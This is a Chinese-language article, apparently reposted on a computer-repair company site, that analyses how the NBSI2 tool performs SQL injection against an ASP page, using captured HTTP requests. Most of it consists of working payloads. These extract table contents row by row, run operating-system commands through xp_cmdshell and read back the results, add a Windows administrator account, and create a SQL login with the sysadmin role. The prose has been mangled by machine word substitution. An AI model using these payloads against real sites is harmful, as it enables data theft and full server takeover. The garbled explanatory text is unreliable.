NBSI2内部功能实现大揭谜-安全工具-福州电脑维修|上门维修维护|包年电脑维修|IT外包

NBSI2内部功能实现大揭谜

Top1
GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%
20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20
[TITLE]%20desc)>0 HTTP/1.1
即：article_read.asp?id=80 And (Select Top 1 isNull(cast([TITLE] as varchar(8000)),char(32))+char(124)
From (Select Top 1 [TITLE] From [testdb]..[ARTICLE] Where 1=1 Order by [TITLE]) T Order by [TITLE] desc)>0
作用是取得TITLE字段的第一行记录的值，以此类推Top N,可以取得别的行的值。
Top2
GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%
20From%20(Select%20Top%202%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20
[TITLE]%20desc)>0 HTTP/1.1
TopN
...
wse抓获的包信息：
//取得article表的记录数
GET /article_read.asp?id=80%20And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20[testdb]..[ARTICLE]%
20Where%201=1)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
3D0
//取得Article表的Title字段的第一条记录内容
GET /article_read.asp?id=80%20And%20(Select%20Top%201%20isNull(cast([TITLE]%20as%20varchar(8000)),char(32))%2Bchar(124)%
20From%20(Select%20Top%201%20[TITLE]%20From%20[testdb]..[ARTICLE]%20Where%201=1%20Order%20by%20[TITLE])%20T%20Order%20by%20
[TITLE]%20desc)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
3D0
...............
//////////////////////////////////////////////
到此，数据库的表名，字段名及字段内容的阐发基本结束，再看一下别的主要功能的阐发。
历程五、执行Dos命令和执行SQL语句
执行Dos命令 dir c:\
////////////////////////////////////////////////
回显抓包阐发：
GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
3D0
GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\%20>%20C:\NB_Commander_Txt.log';DROP%20TABLE%
20NB_Commander_Tmp;CREATE%20TABLE%20NB_Commander_Tmp(ResultTxt%20varchar(7996)%20NULL);BULK%20INSERT%20[testdb]..
[NB_Commander_Tmp]%20FROM%20'C:\NB_Commander_Txt.log'%20WITH%20(KEEPNULLS);Alter%20Table%20NB_Commander_Tmp%20add%20ID%
20int%20NOT%20NULL%20IDENTITY%20(1,1)-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%
3D0
主要是这个：
article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\ > C:\NB_Commander_Txt.log';
DROP TABLE NB_Commander_Tmp;CREATE TABLE NB_Commander_Tmp(ResultTxt varchar(7996) NULL);
BULK INSERT [testdb]..[NB_Commander_Tmp] FROM 'C:\NB_Commander_Txt.log' WITH (KEEPNULLS);
Alter Table NB_Commander_Tmp add ID int NOT NULL IDENTITY%20(1,1)--
BULK INSERT 以用户指定的格式复制一个数据文件至数据库表或视图中。
KEEPNULLS 指定在大容量复制操作中空列应保存一个空值，而不是对拔出的列付与默许值。
具体的细致先容请查看T-sql语法，有细致说明。
下面语句的功能就是就是将执行Dos命令Dir c:\的结果生存到一个文件NB_Commander_Txt.log中，然后将此文件的内容写入到新建的暂时表
NB_Commander_Tmp，并增长一个自增长字段ID，信赖各人很容易看明白。
ID=1
GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%
2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=1)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%
3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%
28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%
5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%
2D%2D
即：article_read.asp?id=80 And (Select Top 1 CASE WHEN ResultTxt is Null then '|' else ResultTxt+'|' End
From NB_Commander_Tmp Where ID=1)=0
输入第一条回显结果，以下同，TopN输入全部的回显结果。
ID=2
GET /article_read.asp?id=80%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null%20then%20'|'%20else%20ResultTxt%
2B'|'%20End%20From%20NB_Commander_Tmp%20Where%20ID=2)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C+%3E+C%
3A%5CNB%5FCommander%5FTxt%2Elog%27%3BDROP+TABLE+NB%5FCommander%5FTmp%3BCREATE+TABLE+NB%5FCommander%5FTmp%
28ResultTxt+varchar%287996%29+NULL%29%3BBULK+INSERT+%5Btestdb%5D%2E%2E%5BNB%5FCommander%5FTmp%5D+FROM+%27C%3A%5CNB%
5FCommander%5FTxt%2Elog%27+WITH+%28KEEPNULLS%29%3BAlter+Table+NB%5FCommander%5FTmp+add+ID+int+NOT+NULL+IDENTITY+%281%2C1%29%
2D%2D
ID=N
...............
输出显示：
[不测输出]
[不测输出]
[不测输出]
[不测输出]
[不测输出]
[不测输出]
[不测输出]
[不测输出]
[不测输出]
[不测输出]
...
...
...
如果正常没有题目，会输出C:\下全部的文件，出现下面的提示，大概原因是数据表NB_Commander_Tmp没有创建乐成，因而不克不及精确输出。
////////////////////////////////////////////////
不回显抓包阐发：
Dos命令 Dir C:\
GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'Dir%20C:\'-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BDROP+TABLE+NB%5FCommander%5FTmp%3BEXEC+MASTER%2E%2EXP%
5FCMDSHELL+%27DEL+C%3A%5CNB%5FCommander%5FTxt%2Elog%27%2D%2D
即：article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'Dir C:\'--
不需要显示输出结果。
输出显示：
命令执行完成
////////////////////////////////////////////////
Dos命令：
net user TsInternetUsers Password /add
GET /article_read.asp?id=80;EXEC%20MASTER..XP_CMDSHELL%20'net%20user%20TsInternetUsers%20Password%20/add'-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%27Dir+C%3A%5C%27%2D%2D
执行别的Dos命令都同上。
id=80;EXEC MASTER..XP_CMDSHELL 'net user TsInternetUsers Password /add'--
id=80;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators TsInternetUsers /add'--
执行SQL命令(同执行Dos命令)
GET /article_read.asp?id=80;exec%20master..sp_addlogin%20UserName,Password-- HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80%3BEXEC+MASTER%2E%2EXP%5FCMDSHELL+%
27net+user+TsInternetUsers+Password+%2Fadd%27%2D%2D
id=80;exec master..sp_addlogin UserName,Password--
id=80;exec master..sp_addsrvrolemember UserName,sysadmin--
....
////////////////////////////////////////////////
到此，Nb2的主要功能阐发完毕，别的的功能各人可以本身阐发，第一次写这么长的文章，大概很乱，也一定存在不少题目，不外实在没有精力
去逐字修正了，希望各人能看明白。谢谢

福州电脑维修

TAG:

评论加载中...

上一篇: Telnet密码破解软件Letmein1.0说明

NBSI2内部功能实现大揭谜

安全工具

新闻动态

友情链接